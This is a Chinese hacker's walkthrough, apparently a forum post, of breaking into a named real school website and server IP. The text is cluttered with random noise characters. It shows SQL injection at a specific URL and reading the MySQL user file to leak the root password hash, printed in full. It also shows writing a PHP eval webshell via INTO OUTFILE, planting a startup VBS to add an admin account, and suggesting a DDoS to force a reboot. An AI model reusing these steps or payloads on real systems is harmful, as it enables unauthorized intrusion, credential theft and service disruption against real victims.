第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
) Y9 L# D, o! r: B" _发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!4 {0 g. @' V# J' _. K3 c& R
2 l! B9 F$ n% S) @0 k; c
/ C; {; M: `2 h2 _3 V
) M0 N* M; U5 A; V( [
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 2 W; ~+ I+ [2 \* U9 j4 n& C
! E, w# u' J# F$ V
那么想可以直接写入shell ,getshell有几个条件:) B4 ^8 w+ n1 ]4 W5 ^$ U! K
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF 7 Y( u$ ~! S( k! c. b; H
2 |, _7 B7 ^5 X! f. L( i4 t试着爆绝对路径:
6 G7 L" R* H4 b: x1./phpMyAdmin/index.php?lang[]=1 . N" e- m1 ^3 L9 R
2./phpMyAdmin/phpinfo.php 0 J- K( J3 _& C) w6 B1 d, r
3./load_file()
" v Z3 q7 p8 b# v4./phpmyadmin/themes/darkblue_orange/layout.inc.php
+ e' m5 @, q) g6 ?5./phpmyadmin/libraries/select_lang.lib.php
9 p6 D( V" y# v3 X# x; ?9 X5 t/ I6./phpmyadmin/libraries/lect_lang.lib.php
7 @: w; x/ p3 I& O7./phpmyadmin/libraries/mcrypt.lib.php 3 {) D, Y8 Z& t9 S, N
8./phpmyadmin/libraries/export/xls.php # d7 J# j* u, ~1 @: s- w) c
% b) Z, y# J; H# m! z/ z8 l' o$ K均不行...........................
% |4 r6 Y8 f& r, s3 b' X, ?% B* n, ?- ]$ X v7 G; z
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
9 x; R# M T K) @. K4 Q
- H6 V# s& ~/ O; {- X* x权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
; `3 U0 s4 k- L4 H) O; a+ M6 [! {4 n; B* @
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
/ s: M; t2 J* R' L3 s' `7 H* U, \' g/ ?. f
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
+ b0 c) ]/ k& n8 ]
% M2 U, E7 G- q; H想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 1 a9 J: t- [, A- Z1 s- U
/ Z) ^3 O1 t- h% l, a4 thttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 1 h$ r& X, o3 m7 X
$ g, m2 W7 ~ C3 ? \" U
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ) j6 k4 ]& I- ?% f- J3 ]9 n0 z
; i0 H" \+ \& X) N# b/ _6 |
成功读到root密码: : u' L8 ] p/ ]4 ]0 X& |. M* Q: y
! f8 H3 u# Z, w3 [17---- r(0072)
% n# j* @, J* a5 p18---- o(006f)
% y6 N! w% x& T# u8 v9 c8 ]& X. V19---- o(006f) ' h( R- [$ s- m5 ?, z
20---- t(0074) + M) @ t2 d4 m$ c
21---- *(002a)
# z+ |4 z& u/ U- F22---- 8(0038)
& l: D. y# u7 s3 i' _( e# v! J23---- 2(0032)
; G9 _& d7 ]$ v/ Q/ @24---- E(0045) , f0 M# G$ J9 y/ C
25---- 1(0031) $ w$ ^3 P+ M/ y6 e" j8 P; k U3 v
26---- C(0043)
& J; }' M/ _, C27---- 5(0035)
+ ]" k2 [$ _! A Y# o28---- 8(0038)
: }- r1 Z2 ]4 m3 c29---- 2(0032) 0 y, ?8 D, o4 E; u' b
30---- 8(0038)
5 y+ I" l4 t# H! q) X31---- A(0041)
2 n9 k7 n# W5 A; w32---- 9(0039) . P6 X( G/ }/ Z s. x
33---- B(0042)
" h5 ~' y! }" @0 P) I' ]. W. x34---- 5(0035) , L6 ?/ D- y" v# N1 p
35---- 4(0034) - Q. }) N3 l4 P/ f
36---- 8(0038)
# j+ D1 j( l5 l. |# w3 P0 F) M& x F37---- 6(0036)
5 w7 u o! q0 U9 ~9 Z5 z* U W38---- 4(0034) ; Z/ i% q5 k/ \! t$ d* F
39---- 9(0039)
: E! h, V! k. @: |9 \% C40---- 1(0031)
' \& f6 a1 W$ Z; F1 t41---- 1(0031)
( Z# T) O% n4 k- S" e7 a1 [& D42---- 5(0035)
' P" M n/ `3 j# m* p. U43---- 3(0033)
, y. X" V, b& ]* C- H0 |44---- 5(0035) % _9 W# m0 }) Y# J$ O6 g& L* E. N
45---- 9(0039) ' W0 Z' H @( \: ]; [
46---- 8(0038) : i6 B2 Q. Y3 |/ Q* y. b
47---- F(0046) " o/ X/ U+ Z3 m9 l) k3 ^- m+ m* L* ^
48---- F(0046)
3 O7 X* w0 a, U |2 n2 t* z49---- 4(0034) 2 R; p6 ^7 R7 g7 f
50---- F(0046)
% F; T+ p7 W% f51---- 0(0030) 7 a) O. l) M% ~4 q
52---- 3(0033) 1 K6 @2 h( l4 u& ^$ ?. k% b0 m* A6 \
53---- 2(0032) - j2 z. e Y1 b6 _
54---- A(0041) % C' r* ~. n3 h
55---- 4(0034)
& }% z/ I7 f8 ^' e5 H9 L- }3 s56---- A(0041) ( R" V; y6 P! t: y
57---- B(0042)
y' P3 U, w! `0 h: Y7 Y# \1 ]( }58---- *(0044)
5 _4 \* Z' D' ?) B1 p59---- *(0035) * z. t6 L' [3 o. ^
60---- *(0041) 8 S8 ?/ f8 l' t1 b' H) c0 @0 T7 Q
61---- *0032)
; z) H; }, i: D4 R& A3 |2 m% x6 X1 O4 o- ]/ Y3 l- U4 c4 d
解密后成功登陆phpmyamin * y J: _) C7 {0 D, S& e
+ C3 V. h1 E& |1 j7 A" p
4 W8 T: @0 w* t" m( u
7 S/ D) a" v) g A! T! [/ s4 Q3 v7 q5 k! Y6 _9 N& H$ I% D( }5 ~/ V
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' 3 ?1 z' n0 }7 d* M
* O' G0 ? Q" @8 G成功执行,拿下shell,菜刀连接:
# f2 A& w% K+ {) j9 W0 T: j) U' V. g+ ?( N( ^
服务器不支持asp,aspx,php提权无果................... # R# M" L* v* R4 ?( o- x# C \3 M
& K# O% z- U% }# Y; R9 u9 I4 h' @但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
0 m9 p8 J% i7 r& t) `3 @' ~服务器上已经有个隐藏帐号了 / W, B% Q. P1 D- e
别名 administrators3 |3 A' r7 u2 m4 c) N1 H
注释 管理员对计算机/域有不受限制的完全访问权
' Z4 Y. t# I ?8 R5 t6 i# x# c( C成员 - n5 g( o7 D k7 {
-------------------------------------------------------------------------------
& a2 x+ E a6 b8 b" O+ h- Q# s8 P% padmin
. j- b6 {0 p, U: C2 FAdministrator
9 ~4 W$ x! U# I+ jslipper$0 g) u! X( A1 M, l
sqluser& u* l; M9 j8 e/ l- g
命令成功完成。 9 e& ]3 a ^& P& {( M
7 Z1 J) M: x! R4 A4 \. G服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。* d9 `) M6 b9 N" J+ e3 [" E: I
; [' r; m3 p( c- W
ddos服务器重启,不然就只能坐等服务器重启了...............................; C, b; r, G& | k% n/ F, D
' n. b% I. M7 Z' }4 U5 m% B
: M! ?0 k0 V. s' v% e% u2 E |